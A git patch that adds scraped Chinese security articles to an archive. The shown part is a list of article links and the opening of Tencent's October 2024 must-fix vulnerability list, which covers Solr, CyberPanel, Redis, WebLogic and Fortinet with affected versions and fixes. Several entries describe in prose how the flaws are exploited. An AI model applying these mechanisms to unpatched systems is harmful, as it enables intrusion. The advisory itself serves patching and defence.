From ad130d755b4cb9065e864e94ffa62bd2e4f2c342 Mon Sep 17 00:00:00 2001 From: test Date: Wed, 20 Nov 2024 04:14:45 +0000 Subject: [PATCH] =?UTF-8?q?=E7=BE=8E=E5=85=A8=E5=9B=BD=E6=B0=B4=E5=8A=A1?= =?UTF-8?q?=E7=B3=BB=E7=BB=9F=E5=AD=98=E5=9C=A8=E5=A4=A7=E9=87=8F=E6=BC=8F?= =?UTF-8?q?=E6=B4=9E=EF=BC=8C=E5=8F=AF=E8=87=B4=E4=BD=BF=E4=B8=8A=E4=BA=BF?= =?UTF-8?q?=E4=BA=BA=E4=BE=9B=E6=B0=B4=E4=B8=AD=E6=96=AD=E3=80=81=E5=B7=B2?= =?UTF-8?q?=E7=9F=A5=E6=BC=8F=E6=B4=9E=EF=BC=81=E5=AE=9D=E5=85=B0=E5=BE=B7?= =?UTF-8?q?=E6=9C=80=E6=96=B0=E6=BC=8F=E6=B4=9E=E7=BB=95=E8=BF=87=E8=A1=A5?= =?UTF-8?q?=E4=B8=81=E9=BB=91=E5=90=8D=E5=8D=95=EF=BC=8C=E9=80=9F=E4=BF=AE?= =?UTF-8?q?=E3=80=81=E3=80=90=E5=AE=89=E5=85=A8=E5=9C=88=E3=80=91=E7=BE=8E?= =?UTF-8?q?=E5=9B=BD=E9=A5=AE=E7=94=A8=E6=B0=B4=E7=B3=BB=E7=BB=9F=E5=AD=98?= =?UTF-8?q?=E5=9C=A8300=E5=A4=9A=E4=B8=AA=E6=BC=8F=E6=B4=9E=EF=BC=8C?= =?UTF-8?q?=E5=BD=B1=E5=93=8D1.1=E4=BA=BF=E4=BA=BA=E3=80=81=E3=80=90?= =?UTF-8?q?=E5=AE=89=E5=85=A8=E5=9C=88=E3=80=91VMware=20vCenter=20Server?= =?UTF-8?q?=E8=BF=9C=E7=A8=8B=E4=BB=A3=E7=A0=81=E6=89=A7=E8=A1=8C=E6=BC=8F?= =?UTF-8?q?=E6=B4=9E=E6=AD=A3=E8=A2=AB=E9=BB=91=E5=AE=A2=E5=B9=BF=E6=B3=9B?= =?UTF-8?q?=E5=88=A9=E7=94=A8=E3=80=81=E3=80=90=E6=BC=8F=E6=B4=9E=E9=80=9A?= =?UTF-8?q?=E5=91=8A=E3=80=91Palo=20Alto=20Networks=20PAN-OS=20=E8=BA=AB?= =?UTF-8?q?=E4=BB=BD=E9=AA=8C=E8=AF=81=E7=BB=95=E8=BF=87=E6=BC=8F=E6=B4=9E?= =?UTF-8?q?(CVE-2024-0012)=E3=80=81=E3=80=90=E6=BC=8F=E6=B4=9E=E9=80=9A?= =?UTF-8?q?=E5=91=8A=E3=80=91Apache=20OFBiz=E8=BF=9C=E7=A8=8B=E4=BB=A3?= =?UTF-8?q?=E7=A0=81=E6=89=A7=E8=A1=8C=E6=BC=8F=E6=B4=9E(CVE-2024-47208)?= =?UTF-8?q?=E3=80=81CNVD=E6=BC=8F=E6=B4=9E=E5=91=A8=E6=8A=A52024=E5=B9=B4?= =?UTF-8?q?=E7=AC=AC46=E6=9C=9F=E3=80=81=E4=B8=8A=E5=91=A8=E5=85=B3?= =?UTF-8?q?=E6=B3=A8=E5=BA=A6=E8=BE=83=E9=AB=98=E7=9A=84=E4=BA=A7=E5=93=81?= =?UTF-8?q?=E5=AE=89=E5=85=A8=E6=BC=8F=E6=B4=9E(20241111-20241117)?= =?UTF-8?q?=E3=80=81=E5=9B=BD=E5=AE=B6=E7=BA=A7=E9=BB=91=E5=AE=A2=E5=88=A9?= =?UTF-8?q?=E7=94=A8=E4=B8=89=E5=A4=A7=20Ivanti=20CSA=20=E9=9B=B6=E6=97=A5?= =?UTF-8?q?=E6=BC=8F=E6=B4=9E=E5=B1=95=E5=BC=80=E6=94=BB=E5=87=BB=EF=BC=8C?= =?UTF-8?q?=E4=BC=81=E4=B8=9A=E9=9C=80=E8=AD=A6=E6=83=95=EF=BC=81=E3=80=81?= =?UTF-8?q?24=E5=B9=B410=E6=9C=88=E5=BF=85=E4=BF=AE=E5=AE=89=E5=85=A8?= =?UTF-8?q?=E6=BC=8F=E6=B4=9E=E6=B8=85=E5=8D=95=EF=BD=9C=E8=85=BE=E8=AE=AF?= =?UTF-8?q?=E5=AE=89=E5=85=A8=E5=A8=81=E8=83=81=E6=83=85=E6=8A=A5=E4=B8=AD?= =?UTF-8?q?=E5=BF=83=E3=80=81=E3=80=90=E6=B8=97=E9=80=8F=E5=B7=A5=E5=85=B7?= =?UTF-8?q?=E3=80=91Swagger=20API=20=E4=BF=A1=E6=81=AF=E6=B3=84=E9=9C=B2?= =?UTF-8?q?=E6=BC=8F=E6=B4=9E=20=E5=B7=A5=E5=85=B7=E7=AF=87=E3=80=81Apache?= =?UTF-8?q?=20Tomcat=E6=9C=80=E6=96=B0=E9=AB=98=E7=89=88=E6=9C=AC=E8=BA=AB?= =?UTF-8?q?=E4=BB=BD=E9=AA=8C=E8=AF=81=E7=BB=95=E8=BF=87=E6=BC=8F=E6=B4=9E?= =?UTF-8?q?=EF=BC=8CPOC=E4=BB=B7=E6=A0=BC=E6=8E=A5=E8=BF=913000=E3=80=81?= =?UTF-8?q?=E6=98=93=E6=80=9D=E6=99=BA=E8=83=BD=E7=89=A9=E6=B5=81=E6=97=A0?= =?UTF-8?q?=E4=BA=BA=E5=80=BC=E5=AE=88=E7=B3=BB=E7=BB=9F=20ExportReport=20?= =?UTF-8?q?SQL=E6=B3=A8=E5=85=A5=E6=BC=8F=E6=B4=9E=E3=80=81X=E6=BC=8F?= =?UTF-8?q?=E6=B4=9E=E5=A5=96=E5=8A=B1=E8=AE=A1=E5=88=92=E6=94=B6=E5=BD=95?= =?UTF-8?q?=E6=89=A9=E5=A4=A7=EF=BC=81=E6=8F=90=E4=BE=9B=E6=9C=AC=E5=9C=B0?= =?UTF-8?q?=E7=8E=AF=E5=A2=83=E5=86=8D=E4=BA=AB=E9=A2=9D=E5=A4=9620%?= =?UTF-8?q?=E5=A5=96=E9=87=91=E5=8A=A0=E6=88=90=EF=BC=81=E3=80=81=E3=80=90?= =?UTF-8?q?=E6=BC=8F=E6=B4=9E=E9=80=9A=E5=91=8A=E3=80=91Palo=20Alto=20Netw?= =?UTF-8?q?orks=20PAN-OS=E5=A4=9A=E4=B8=AA=E9=AB=98=E5=8D=B1=E6=BC=8F?= =?UTF-8?q?=E6=B4=9E=E5=AE=89=E5=85=A8=E9=A3=8E=E9=99=A9=E9=80=9A=E5=91=8A?= =?UTF-8?q?=E3=80=81=E8=85=BE=E8=AE=AF=E5=AE=89=E5=85=A8=E5=A8=81=E8=83=81?= =?UTF-8?q?=E6=83=85=E6=8A=A5=E4=B8=AD=E5=BF=83=E6=8E=A8=E5=87=BA2024?= =?UTF-8?q?=E5=B9=B410=E6=9C=88=E5=BF=85=E4=BF=AE=E5=AE=89=E5=85=A8?= =?UTF-8?q?=E6=BC=8F=E6=B4=9E=E6=B8=85=E5=8D=95=E3=80=81=E3=80=90=E6=BC=8F?= =?UTF-8?q?=E6=B4=9E=E9=A2=84=E8=AD=A6=20=E3=80=91SRM=E6=99=BA=E8=81=94?= =?UTF-8?q?=E4=BA=91=E9=87=87=E7=B3=BB=E7=BB=9F=E5=AD=98=E5=9C=A8=E5=A4=9A?= =?UTF-8?q?=E5=A4=84SQL=E6=B3=A8=E5=85=A5=E6=BC=8F=E6=B4=9E=E3=80=81?= =?UTF-8?q?=E3=80=90=E6=BC=8F=E6=B4=9E=E9=A2=84=E8=AD=A6=E3=80=91=E4=B8=9C?= =?UTF-8?q?=E8=83=9C=E7=89=A9=E6=B5=81=E8=BD=AF=E4=BB=B6-certupload-?= =?UTF-8?q?=E4=BB=BB=E6=84=8F=E6=96=87=E4=BB=B6=E4=B8=8A=E4=BC=A0=E6=BC=8F?= =?UTF-8?q?=E6=B4=9E=E3=80=81400=E4=B8=87=E7=BD=91=E7=AB=99=E5=8F=97?= =?UTF-8?q?=E5=BD=B1=E5=93=8D=EF=BC=81WordPress=20Really=20Simple=20Securi?= =?UTF-8?q?ty=20=E6=8F=92=E4=BB=B6=E6=BC=8F=E6=B4=9E=E5=88=86=E6=9E=90?= =?UTF-8?q?=E3=80=81=E6=B7=B1=E5=85=A5=E8=A7=A3=E6=9E=90=20CVE-2024-51567?= =?UTF-8?q?=EF=BC=9ACyberPanel=20=E5=91=BD=E4=BB=A4=E6=B3=A8=E5=85=A5?= =?UTF-8?q?=E6=BC=8F=E6=B4=9E=E5=8F=8A=20PoC=20=E5=A4=8D=E7=8E=B0=E3=80=81?= =?UTF-8?q?Linux=E7=BD=91=E7=BB=9C=E6=B5=81=E9=87=8F=E7=9B=91=E6=8E=A7?= =?UTF-8?q?=E5=B7=A5=E5=85=B7=E3=80=81Apple=20=E7=A1=AE=E8=AE=A4=20macOS?= =?UTF-8?q?=20=E7=B3=BB=E7=BB=9F=E9=81=AD=E5=8F=970day=E6=BC=8F=E6=B4=9E?= =?UTF-8?q?=E6=94=BB=E5=87=BB=E3=80=81VMware=20vCenter=20=E5=92=8C=20Kemp?= =?UTF-8?q?=20LoadMaster=20=E6=BC=8F=E6=B4=9E=E6=AD=A3=E5=8F=97=E5=88=B0?= =?UTF-8?q?=E7=A7=AF=E6=9E=81=E5=88=A9=E7=94=A8=E3=80=81=E6=BC=8F=E6=B4=9E?= =?UTF-8?q?=E9=A2=84=E8=AD=A6=20|=20=E5=85=A8=E7=A8=8B=E4=BA=91OA=20SQL?= =?UTF-8?q?=E6=B3=A8=E5=85=A5=E6=BC=8F=E6=B4=9E=E3=80=81=E3=80=900day?= =?UTF-8?q?=E3=80=91=E8=B5=84=E4=BA=A7=E7=AE=A1=E7=90=86=E8=BF=90=E8=90=A5?= =?UTF-8?q?=E7=B3=BB=E7=BB=9F=EF=BC=88=E8=B5=84=E7=AE=A1=E4=BA=91=EF=BC=89?= =?UTF-8?q?=E5=AD=98=E5=9C=A8=E5=89=8D=E5=8F=B0=E6=96=87=E4=BB=B6=E4=B8=8A?= =?UTF-8?q?=E4=BC=A0=E6=BC=8F=E6=B4=9E=E3=80=81?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- data.json | 27 +- ...月必修安全漏洞清单|腾讯安全威胁情报中心.md | 661 ++++++++++++++++++ ...WordPress Really Simple Security 插件漏洞分析.md | 54 ++ ...高版本身份验证绕过漏洞,POC价格接近3000.md | 38 + doc/Apple 确认 macOS 系统遭受0day漏洞攻击.md | 46 ++ doc/CNVD漏洞周报2024年第46期.md | 2 +- doc/Linux网络流量监控工具.md | 46 ++ ...r 和 Kemp LoadMaster 漏洞正受到积极利用.md | 62 ++ ...收录扩大!提供本地环境再享额外20%奖金加成!.md | 105 +++ ...管理运营系统(资管云)存在前台文件上传漏洞.md | 134 ++++ ...透工具】Swagger API 信息泄露漏洞 工具篇.md | 196 ++++++ ... Alto Networks PAN-OS多个高危漏洞安全风险通告.md | 135 ++++ ...预警 】SRM智联云采系统存在多处SQL注入漏洞.md | 66 ++ ...】东胜物流软件-certupload-任意文件上传漏洞.md | 2 +- ...注度较高的产品安全漏洞(20241111-20241117).md | 2 +- ...三大 Ivanti CSA 零日漏洞展开攻击,企业需警惕!.md | 55 ++ ...物流无人值守系统 ExportReport SQL注入漏洞.md | 112 +++ ...4-51567:CyberPanel 命令注入漏洞及 PoC 复现.md | 142 ++++ doc/漏洞预警 | 全程云OA SQL注入漏洞.md | 44 ++ ...威胁情报中心推出2024年10月必修安全漏洞清单.md | 661 ++++++++++++++++++ 20 files changed, 2586 insertions(+), 4 deletions(-) create mode 100644 doc/24年10月必修安全漏洞清单|腾讯安全威胁情报中心.md create mode 100644 doc/400万网站受影响!WordPress Really Simple Security 插件漏洞分析.md create mode 100644 doc/Apache Tomcat最新高版本身份验证绕过漏洞,POC价格接近3000.md create mode 100644 doc/Apple 确认 macOS 系统遭受0day漏洞攻击.md create mode 100644 doc/Linux网络流量监控工具.md create mode 100644 doc/VMware vCenter 和 Kemp LoadMaster 漏洞正受到积极利用.md create mode 100644 doc/X漏洞奖励计划收录扩大!提供本地环境再享额外20%奖金加成!.md create mode 100644 doc/【0day】资产管理运营系统(资管云)存在前台文件上传漏洞.md create mode 100644 doc/【渗透工具】Swagger API 信息泄露漏洞 工具篇.md create mode 100644 doc/【漏洞通告】Palo Alto Networks PAN-OS多个高危漏洞安全风险通告.md create mode 100644 doc/【漏洞预警 】SRM智联云采系统存在多处SQL注入漏洞.md create mode 100644 doc/国家级黑客利用三大 Ivanti CSA 零日漏洞展开攻击,企业需警惕!.md create mode 100644 doc/易思智能物流无人值守系统 ExportReport SQL注入漏洞.md create mode 100644 doc/深入解析 CVE-2024-51567:CyberPanel 命令注入漏洞及 PoC 复现.md create mode 100644 doc/漏洞预警 | 全程云OA SQL注入漏洞.md create mode 100644 doc/腾讯安全威胁情报中心推出2024年10月必修安全漏洞清单.md diff --git a/data.json b/data.json index bc6dc7ba..ebd577dc 100644 --- a/data.json +++ b/data.json @@ -229,5 +229,30 @@ "https://mp.weixin.qq.com/s?__biz=MzkwMTQ0NDA1NQ==&mid=2247491464&idx=2&sn=0d4045776a636e09c6c243c1be42ec18": "漏洞预警 | 金蝶EAS任意文件写入漏洞", "https://mp.weixin.qq.com/s?__biz=MzkwMTQ0NDA1NQ==&mid=2247491464&idx=3&sn=ac7cc21a14507ada677b925d8c2f9060": "漏洞预警 | 顺景ERP管理系统任意文件上传漏洞", "https://mp.weixin.qq.com/s?__biz=Mzk0ODM0NDIxNQ==&mid=2247492775&idx=1&sn=93a3a6836cb68f8168e9655508828d18": "漏洞利用、shell反弹 | 一键利用工具", - "https://mp.weixin.qq.com/s?__biz=MzkyNTUyNTE5OA==&mid=2247486175&idx=1&sn=fa6fd7a401164cbcb62a25a9ecc5f8ac": "SpringSecurity权限绕过漏洞-好玩" + "https://mp.weixin.qq.com/s?__biz=MzkyNTUyNTE5OA==&mid=2247486175&idx=1&sn=fa6fd7a401164cbcb62a25a9ecc5f8ac": "SpringSecurity权限绕过漏洞-好玩", + "https://mp.weixin.qq.com/s?__biz=MzI4NDY2MDMwMw==&mid=2247513105&idx=1&sn=db4c2c400bfc1b8ac9c2e39ffcc2d0f8&chksm=ebfaf331dc8d7a273b6268ba76b25e4bbec7d9c0e5d64cf4fdb0a7c8cb0ac781e6c8671e1848&scene=58&subscene=0": "美全国水务系统存在大量漏洞,可致使上亿人供水中断", + "https://mp.weixin.qq.com/s?__biz=Mzg5MTc3ODY4Mw==&mid=2247507416&idx=1&sn=6eb8217321fbe1a5361675058bc55882&chksm=cfcabeccf8bd37dabd939a20bc64440bf305ffe94e1ee391c8b758d1eba8cec1ca2099880c09&scene=58&subscene=0": "已知漏洞!宝兰德最新漏洞绕过补丁黑名单,速修", + "https://mp.weixin.qq.com/s?__biz=MzIzMzE4NDU1OQ==&mid=2652066082&idx=3&sn=45c8dff3a066a1615c872523d972e645&chksm=f36e7d62c419f474a8053972dd9c71ee6170c6482642d86218c62a4788ba6c3240875f3d16fb&scene=58&subscene=0": "【安全圈】美国饮用水系统存在300多个漏洞,影响1.1亿人", + "https://mp.weixin.qq.com/s?__biz=MzIzMzE4NDU1OQ==&mid=2652066082&idx=4&sn=c7244d3c2cda936e8c968cf0a2ade6d0&chksm=f36e7d62c419f474201413fc6e1edcc5c024cfb6fa12a9adf16b49526e98689324bb9aa57fd0&scene=58&subscene=0": "【安全圈】VMware vCenter Server远程代码执行漏洞正被黑客广泛利用", + "https://mp.weixin.qq.com/s?__biz=Mzg2NjgzNjA5NQ==&mid=2247523853&idx=1&sn=09a7e2c49e4d18c988053c13b775aa17&chksm=ce46151df9319c0b5e3101ae19289c72f2bde1df88b14593ff9d674aef5cea0434014a7f2615&scene=58&subscene=0": "【漏洞通告】Palo Alto Networks PAN-OS 身份验证绕过漏洞(CVE-2024-0012)", + "https://mp.weixin.qq.com/s?__biz=Mzg2NjgzNjA5NQ==&mid=2247523853&idx=2&sn=44f939a81178afad27dca90a02dfbfc6&chksm=ce46151df9319c0b1559eee9e9bf40c82367612f10de3b61f2f666f2558bea2f5f10938518ef&scene=58&subscene=0": "【漏洞通告】Apache OFBiz远程代码执行漏洞(CVE-2024-47208)", + "https://mp.weixin.qq.com/s?__biz=MzIwNDk0MDgxMw==&mid=2247499470&idx=1&sn=122371c064b4a5b04d3f673d1a172d6e&chksm=973acdaca04d44ba3d0421968e02c6666f2064e33000519c729c6423ce5c41367a1ccdcf4833&scene=58&subscene=0": "CNVD漏洞周报2024年第46期", + "https://mp.weixin.qq.com/s?__biz=MzIwNDk0MDgxMw==&mid=2247499470&idx=2&sn=d9bbe418f8309153c86b2c38bdb82f17&chksm=973acdaca04d44bab50e7dd62b73186be71557b6394c3c63dc18ec7ef4c20bae0c517a0aa368&scene=58&subscene=0": "上周关注度较高的产品安全漏洞(20241111-20241117)", + "https://mp.weixin.qq.com/s?__biz=Mzg3OTYxODQxNg==&mid=2247485415&idx=1&sn=541476a2be6c2a7837e6dd6b2b173171": "国家级黑客利用三大 Ivanti CSA 零日漏洞展开攻击,企业需警惕!", + "https://mp.weixin.qq.com/s?__biz=MzI5ODk3OTM1Ng==&mid=2247509929&idx=1&sn=8e56d271814d4694e976b6fdf261784e": "24年10月必修安全漏洞清单|腾讯安全威胁情报中心", + "https://mp.weixin.qq.com/s?__biz=MzU5NTEwMTMxMw==&mid=2247485379&idx=1&sn=b13eaf7a0ae232fd4ec54d414aa2f506": "【渗透工具】Swagger API 信息泄露漏洞 工具篇", + "https://mp.weixin.qq.com/s?__biz=Mzg3ODkzNjU4NA==&mid=2247485578&idx=1&sn=01f25a92b61057e789d1dc89c9d0cf58": "Apache Tomcat最新高版本身份验证绕过漏洞,POC价格接近3000", + "https://mp.weixin.qq.com/s?__biz=MzkzMTcwMTg1Mg==&mid=2247489282&idx=1&sn=db4d0926ef072190c0b575b85b7f53a2": "易思智能物流无人值守系统 ExportReport SQL注入漏洞", + "https://mp.weixin.qq.com/s?__biz=Mzg5MTc3ODY4Mw==&mid=2247507413&idx=1&sn=a43f7ec33d899e45aa9b77f5005fd056": "X漏洞奖励计划收录扩大!提供本地环境再享额外20%奖金加成!", + "https://mp.weixin.qq.com/s?__biz=MzU4NjY4MDAyNQ==&mid=2247496771&idx=1&sn=1841c42f1b7592fc316ee23a3dae8be0": "【漏洞通告】Palo Alto Networks PAN-OS多个高危漏洞安全风险通告", + "https://mp.weixin.qq.com/s?__biz=MzkzNTI4NjU1Mw==&mid=2247485007&idx=1&sn=f43a33dcb7b9278a231606867d08db8e": "腾讯安全威胁情报中心推出2024年10月必修安全漏洞清单", + "https://mp.weixin.qq.com/s?__biz=MzIyNjk0ODYxMA==&mid=2247487503&idx=1&sn=142cc21e2bc7576e1660e7eafa64b96d": "【漏洞预警 】SRM智联云采系统存在多处SQL注入漏洞", + "https://mp.weixin.qq.com/s?__biz=MzIyNjk0ODYxMA==&mid=2247487503&idx=2&sn=818021e6e5c7bbfef6a642e2f7f8fd75": "【漏洞预警】东胜物流软件-certupload-任意文件上传漏洞", + "https://mp.weixin.qq.com/s?__biz=MzU1NzczNTM1MQ==&mid=2247485045&idx=1&sn=e2aef89feda4402f8f5baa7ea01684ed": "400万网站受影响!WordPress Really Simple Security 插件漏洞分析", + "https://mp.weixin.qq.com/s?__biz=MzU1NzczNTM1MQ==&mid=2247485045&idx=2&sn=a92234b4814af7a59f703f23bbed96c3": "深入解析 CVE-2024-51567:CyberPanel 命令注入漏洞及 PoC 复现", + "https://mp.weixin.qq.com/s?__biz=MzkxMzIwNTY1OA==&mid=2247509168&idx=1&sn=f2df0d7acfbf06066aa1fb37a3da6f2b": "Linux网络流量监控工具", + "https://mp.weixin.qq.com/s?__biz=MzI2NzAwOTg4NQ==&mid=2649793188&idx=2&sn=4a4f1209a4a33af5ff2cb6681e83d52e": "Apple 确认 macOS 系统遭受0day漏洞攻击", + "https://mp.weixin.qq.com/s?__biz=MzI2NzAwOTg4NQ==&mid=2649793188&idx=3&sn=985eaa11c8319087deda24624c9bda68": "VMware vCenter 和 Kemp LoadMaster 漏洞正受到积极利用", + "https://mp.weixin.qq.com/s?__biz=MzkwMTQ0NDA1NQ==&mid=2247491464&idx=1&sn=dddb959fc1bb2fdc915c3c0b79b376cc": "漏洞预警 | 全程云OA SQL注入漏洞", + "https://mp.weixin.qq.com/s?__biz=MzU3MjU4MjM3MQ==&mid=2247488439&idx=1&sn=3f053aa65cd1e0edc84e4e7baf0d87be": "【0day】资产管理运营系统(资管云)存在前台文件上传漏洞" } \ No newline at end of file diff --git a/doc/24年10月必修安全漏洞清单|腾讯安全威胁情报中心.md b/doc/24年10月必修安全漏洞清单|腾讯安全威胁情报中心.md new file mode 100644 index 00000000..6c9c3dc3 --- /dev/null +++ b/doc/24年10月必修安全漏洞清单|腾讯安全威胁情报中心.md @@ -0,0 +1,661 @@ +# 24年10月必修安全漏洞清单|腾讯安全威胁情报中心 +腾讯威胁情报中心 腾讯安全威胁情报中心 2024-11-20 03:53 + +所谓必修漏洞,就是运维人员必须修复、不可拖延、影响范围较广的漏洞,被黑客利用并发生入侵事件后,会造成十分严重的后果。 + +腾讯安全威胁情报中心参考“安全漏洞的危害及影响力、漏洞技术细节披露情况、该漏洞在安全技术社区的讨论热度”等因素,综合评估该漏洞在攻防实战场景的风险。当漏洞综合评估为风险严重、影响面较广、技术细节已披露,且被安全社区高度关注时,就将该漏洞列入必修安全漏洞候选清单。  + + +腾讯安全威胁情报中心定期发布安全漏洞必修清单,以此指引政企客户安全运维人员修复漏洞,从而避免重大损失。  +**以下是2024年10月份必修安全漏洞清单**: + +‍‍‍ +一、Apache Solr 身份验证绕过漏洞(CVE-2024-45216) + +二、 +CyberPanel 远程代码执行漏洞(CVE-2024-51567) + +三、Redis 缓冲区溢出漏洞(CVE-2024-31449) + +四、Weblogic Server T3/IIOP  +远程代码执行漏洞(CVE-2024-21216) + +五、Fortinet FortiManager 身份认证绕过 +漏洞(CVE-2024-47575) + +六、Kubernetes Image Builder 默认凭据登录 +漏洞(CVE-2024-9486) + +七、Spring Framework 路径遍历漏洞(CVE-2024-38819) + +八、GitLab EE 权限绕过漏洞(CVE-2024-9164) + +九、ThinkPHP 反序列化漏洞(CVE-2024-48112) + +十、Mozilla Firefox Animation timelines 释放后重用漏洞(CVE-2024-9680) + +‍‍‍ + +**漏洞介绍及修复建议详见后文** + + +**一、****Apache Solr 身份验证绕过漏洞** + +**** +**** +**概述:** + +腾讯安全近期监测到Apache官方发布了关于Solr的风险公告,漏洞编号:TVD-2024-28124。(CVE编号:CVE-2024-45216,CNNVD编号:CNNVD-202410-1596)。成功利用此漏洞的攻击者,最终可绕过权限验证访问受限页面。 + +Apache Solr是一款基于Apache Lucene的开源搜索平台,它不仅提供了快速、准确的全文搜索功能,还具备实时数据分析的能力。Solr的设计使其能够轻松处理大规模数据集,并通过高度可定制的排序、过滤和评分机制来优化搜索结果。此外,Solr支持多种数据格式和编程接口,包括XML、JSON以及Java、Python等多种语言的客户端库,极大地方便了开发者的集成工作。 + +据描述,该漏洞源于Solr中的 PKIAuthenticationPlugin 存在认证逻辑错误,攻击者可以将特定路径拼接至URL末尾绕过权限验证,最终访问任意路由,从而获取敏感数据或进行其他恶意操作。 + +**漏洞状态:** +
类别
状态
安全补丁
已公开
漏洞细节
已公开
PoC
已公开
在野利用
已发现
+ +**风险等级:** +
评定方式
等级
威胁等级
高危
影响面
攻击者价值
利用难度
漏洞评分
9.8
+ +**影响版本:** + +5.3.0 <= Apache Solr < 8.11.4 + +9.0.0 <= Apache Solr < 9.7.0 + + +**修复建议:** + +1 +. +官方已发布漏洞补丁及修复版本,请评估业务是否受影响后,酌情升级至安全版本。 + + +【备注】:建议您在升级前做好数据备份工作,避免出现意外。 + +https://solr.apache.org/downloads.html + +2. 临时缓解方案: + +- 如非必要,避免将Apache Solr开放至公网。 + +- 设置白名单访问。 + +**二、****CyberPanel 远程代码执行漏洞** + +**** +**** +**** +**** +**概述:** + +腾讯安全近期监测到CyberPanel官方发布了关于CyberPanel的风险公告,漏洞编号:TVD-2024-29503 (CVE编号:CVE-2024-51567,CNNVD编号:CNNVD-202410-3421)。成功利用此漏洞的攻击者,最终可远程执行任意代码。 + +CyberPanel是一款强大且易于使用的控制面板,专为Web hosting和网站管理设计。它提供了直观的用户界面,让用户能够轻松管理虚拟主机、域名、电子邮件账户、数据库等资源。CyberPanel还具备一键安装LAMP/WAMP环境、强大的备份和恢复功能。此外,其高性能和稳定性确保了用户的网站能够顺畅运行。 + +该漏洞源于CyberPanel中的 upgrademysqlstatus接口权限校验功能存在缺陷,且CyberPanel中的secMiddleware只对POST请求传输的内容进行恶意字符过滤。攻击者可以通过获取到的csrf token绕过权限校验,并构造非POST请求的恶意请求,最终远程执行任意代码。 + +**漏洞状态:** +
类别
状态
安全补丁
已公开
漏洞细节
已公开
PoC
已公开
在野利用
已发现
+ +**风险等级:** +
评定方式
等级
威胁等级
高危
影响面
攻击者价值
利用难度
漏洞评分
9.8
+ +**影响版本:** + +CyberPanel < 2.3.8 + +**修复建议:** + +1. 官方已发布漏洞补丁及修复版本,请评估业务是否受影响后,酌情升级至安全版本。 + +【备注】:建议您在升级前做好数据备份工作,避免出现意外。 + + +https://cyberpanel.net/blog/detials-and-fix-of-recent-security-issue-and-patch-of-cyberpanel + +2. 临时缓解方案: + +- 如非必要,避免开放CyberPanel服务至公网。 + +- 设置白名单访问。 + + + + + +**三、****Redis 缓冲区溢出漏洞** + +**** +**** +**** +**概述:** + +腾讯安全近期监测到关于Redis的风险公告,漏洞编号为TVD-2024-26971 (CVE编号:CVE-2024-31449,CNNVD编号:CNNVD-202410-612)。成功利用此漏洞的攻击者,可能触发远程代码执行。 + +Redis是一款开源的高性能键值对存储数据库,它以内存为数据存储介质,提供了快速的数据读写能力。Redis支持多种数据结构,如字符串、哈希表、列表、集合和有序集合等,同时还具备发布订阅、事务、Lua脚本处理等功能。因其出色的性能和丰富的功能,Redis被广泛应用于缓存、消息队列、实时分析等场景,成为现代互联网应用中不可或缺的技术组件。 + +据描述,该漏洞源于Redis 中的Lua库存在代码缺陷,经过身份验证的攻击者可通过发送特制的Lua脚本触发堆栈缓冲区溢出,最终可能导致远程代码执行。 + +**漏洞状态:** +
类别
状态
安全补丁
已公开
漏洞细节
已公开
PoC
已公开
在野利用
未发现
+ +**风险等级:** +
评定方式
等级
威胁等级
高危
影响面
攻击者价值
利用难度
漏洞评分
7.0
+ +**影响版本:** + +Redis 开源/社区版 < 6.2.16 + +Redis 开源/社区版 < 7.2.6 + +Redis 开源/社区版 < 7.4.1 + +Redis Stack < 6.2.6-v17 + +Redis Stack < 7.2.0-v13 + +Redis Stack < 7.4.0-v1 + +Redis 商业版 < 6.4.2-110 + +Redis 商业版 < 7.2.4-109 + +Redis 商业版 < 7.4.2-169 + +Redis 商业版 < 7.4.6 + +**修复建议:** + +1. 官方已发布漏洞补丁及修复版本,请评估业务是否受影响后,酌情升级至安全版本。 + +【备注】:建议您在升级前做好数据备份工作,避免出现意外。 + + +https://github.com/redis/redis/releases + +2. +临时缓解方案: + +- 利用安全组设置Redis仅对可信地址开放。 + +- 强制对Redis实例的所有访问使用凭据。 + +- 设置用户权限,仅允许受信任的身份运行Lua脚本或任何其他潜在危险的命令。 + +**四、****WebLogic Server T3/IIOP远程命令执行漏洞** + +**** +**** + +**** +**概述:** + +腾讯安全近期监测到 +Oracle +官方发布了 +WebLogic +的风险公告,漏洞编号为 +TVD-2024-27951 (CVE +编号: +CVE-2024-21216 +, +CNNVD +编号: +CNNVD-202410-1425) +。成功利用此漏洞的攻击者,最终可以远程执行任意代码。 + +WebLogic是Oracle公司开发的一款企业级应用服务器,它提供了强大的Web应用程序和EJB容器的功能,支持Java EE标准。WebLogic可以作为开发和部署企业应用的平台,提供了诸如事务管理、安全性、集群、负载均衡以及可扩展性等关键特性,旨在简化企业级应用的开发、部署和管理。因其稳定性和强大的功能集,WebLogic在企业级应用中得到了广泛的应用。 + +据描述,该漏洞源于Weblogic存在代码缺陷,攻击者可以通过T3/IIOP协议发送特制的请求触发反序列化漏洞,最终远程执行任意代码。 + +**漏洞状态:** +
类别
状态
安全补丁
已公开
漏洞细节
已公开
PoC
已公开
在野利用
已发现
+ +**风险等级:** +
评定方式
等级
威胁等级
高危
影响面
攻击者价值
利用难度
漏洞评分
9.8
+ +**影响版本:** + +WebLogic 12.2.1.4.0 + +WebLogic 14.1.1.0.0 + +**修复建议:** + +1.  +官方已发布漏洞补丁及修复版本,请评估业务是否受影响后,酌情升级至安全版本。 + +【备注】:建议您在升级前做好数据备份工作,避免出现意外。 + +https://www.oracle.com/security-alerts/cpuoct2024.html + + +2.  +临时缓解方案 + +- +禁用 +T3协议,登录 +weblogic后台页面,在 +base_domain的配置页面中,进入 +“安全 +”选项卡页面,点击 +“筛选器 +”,进入连接筛选器配置。在连接筛选器中输入: +``` +WebLogic.security.net.ConnectionFilterImpl +``` + + +参考以下写法,在连接筛选器规则中进行配置: +``` +127.0.0.1 * * allow t3 t3s +* * * deny t3 t3s +``` + +- +禁用 +IIOP协议,登录 +weblogic后台页面,在左侧菜单页中点击 环境 +->服务器 +->AdminServer->协议 +->IIOP,取消勾选 +“启动 +IIOP”。 + + +**五、****Fortinet FortiManager 身份认证绕过漏洞** + +**** +**** +**** +**概述:** + +腾讯安全近期监测到Fortinet官方发布了关于FortiManager的风险公告,漏洞编号为TVD-2024-29074 (CVE编号:CVE-2024-47575,CNNVD编号:CNNVD-202410-2613),未经身份验证的远程攻击者可以利用该漏洞绕过身份验证,远程执行任意代码。 + +FortiManager 是 Fortinet 公司推出的一款强大的集中式网络安全管理解决方案。它通过提供一个统一的界面,简化了对 Fortinet 